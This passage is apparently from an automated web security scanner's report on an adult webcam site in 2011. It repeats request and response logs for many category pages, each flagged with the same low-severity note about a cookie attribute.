ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /webcam-sign-up/ Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:41 GMT Connection: close Content-Length: 137
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:42 GMT Connection: close Content-Length: 33116 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:21 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:30 GMT Connection: close Content-Length: 110732 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:51 GMT Connection: close Content-Length: 212158 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:44 GMT Connection: close Content-Length: 24479 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:53 GMT Connection: close Content-Length: 72506 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoidMay82O9Ww8iIgmnpOkaYYd%2bRloG%2b4CAmxrVQ%2bGzRheecUYgUyCFOOp2ODZpcVY%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:47 GMT Connection: close Content-Length: 51624 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:18 GMT Connection: close Content-Length: 33498 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:55 GMT Connection: close Content-Length: 194997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:44 GMT Connection: close Content-Length: 69731 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:55 GMT Connection: close Content-Length: 22310 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
